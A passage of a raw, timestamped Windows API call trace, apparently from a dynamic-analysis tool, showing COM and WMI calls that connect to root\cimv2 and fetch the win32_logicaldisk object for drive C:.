0x80004002 [0158.577] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x77be88) returned 0x0 [0158.577] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77be88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.577] WbemDefPath:IUnknown:Release (This=0x77be88) returned 0x3 [0158.577] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0158.578] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0158.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0158.578] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0158.578] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0158.578] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0158.578] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0158.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x67383f0) returned 0x0 [0158.578] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0158.578] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0158.578] WbemDefPath:IWbemPath:SetText (This=0x67383f0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetInfo (in: This=0x67383f0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0158.578] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0158.579] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.579] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0158.579] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0158.579] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0158.579] IUnknown:Release (This=0x72015c) returned 0x1 [0158.580] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6736ef8) returned 0x0 [0158.580] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ef8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0158.581] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ef8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x67385b0) returned 0x0 [0158.581] WbemDefPath:IUnknown:Release (This=0x6736ef8) returned 0x0 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x67385b0) returned 0x0 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0158.581] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x77c018) returned 0x0 [0158.581] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c018, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.581] WbemDefPath:IUnknown:Release (This=0x77c018) returned 0x3 [0158.581] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0158.581] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0158.581] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0158.581] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0158.581] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0158.581] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0158.581] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0158.582] WbemDefPath:IUnknown:QueryInterface (in: This=0x67385b0, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x67385b0) returned 0x0 [0158.582] WbemDefPath:IUnknown:AddRef (This=0x67385b0) returned 0x3 [0158.582] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x2 [0158.582] WbemDefPath:IWbemPath:SetText (This=0x67385b0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0158.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0158.582] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0158.582] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.582] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0158.582] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0158.582] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0158.582] IUnknown:Release (This=0x72015c) returned 0x1 [0158.583] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x672f2f8) returned 0x0 [0158.583] WbemLocator:IUnknown:QueryInterface (in: This=0x672f2f8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0158.583] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f2f8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6736f08) returned 0x0 [0158.583] WbemLocator:IUnknown:Release (This=0x672f2f8) returned 0x0 [0158.583] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: ppvObject=0x689eecc*=0x6736f08) returned 0x0 [0158.583] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0158.583] WbemLocator:IUnknown:AddRef (This=0x6736f08) returned 0x3 [0158.583] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0158.583] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0158.584] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0158.584] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0158.584] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0158.584] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0158.584] WbemLocator:IUnknown:Release (This=0x6736f08) returned 0x2 [0158.584] WbemLocator:IUnknown:Release (This=0x6736f08) returned 0x1 [0158.584] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0158.584] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0158.584] WbemLocator:IUnknown:QueryInterface (in: This=0x6736f08, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6736f08) returned 0x0 [0158.584] WbemLocator:IUnknown:AddRef (This=0x6736f08) returned 0x3 [0158.584] WbemLocator:IUnknown:Release (This=0x6736f08) returned 0x2 [0158.584] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0158.584] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0158.584] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.584] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6736ec8) returned 0x0 [0158.584] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736ec8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x672ccec) returned 0x0 [0161.196] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x781094) returned 0x0 [0161.196] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781094, pProxy=0x672ccec, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0161.196] WbemLocator:IUnknown:Release (This=0x781094) returned 0x1 [0161.196] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x7810b4) returned 0x0 [0161.197] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x781094) returned 0x0 [0161.197] WbemLocator:IClientSecurity:SetBlanket (This=0x781094, pProxy=0x672ccec, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0161.197] WbemLocator:IUnknown:Release (This=0x781094) returned 0x2 [0161.197] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x1 [0161.197] CoTaskMemFree (pv=0x77e058) [0161.197] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0161.197] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x7810b4) returned 0x0 [0161.197] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0161.197] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0161.198] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0161.198] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0161.198] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0161.198] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x781014) returned 0x0 [0161.198] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781014, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.199] WbemLocator:IUnknown:Release (This=0x781014) returned 0x3 [0161.199] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0161.199] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0161.199] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x78109c) returned 0x0 [0161.199] WbemLocator:IRpcOptions:Query (in: This=0x78109c, pPrx=0x7810b4, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0161.199] WbemLocator:IUnknown:Release (This=0x78109c) returned 0x3 [0161.199] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0161.199] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0161.199] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0161.199] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: ppvObject=0x689f174*=0x672ccec) returned 0x0 [0161.199] WbemLocator:IUnknown:AddRef (This=0x672ccec) returned 0x4 [0161.199] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x3 [0161.199] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x2 [0161.199] SysStringLen (param_1=0x0) returned 0x0 [0161.199] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67383f0, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0161.199] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0161.199] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.199] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0161.199] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0161.199] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x7810b4) returned 0x0 [0161.199] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x3 [0161.199] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0161.199] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0161.199] WbemDefPath:IWbemPath:GetText (in: This=0x67383f0, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.200] IWbemServices:GetObject (in: This=0x672ccec, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673b468, ppCallResult=0x0) returned 0x0 [0161.532] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0161.532] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=4, 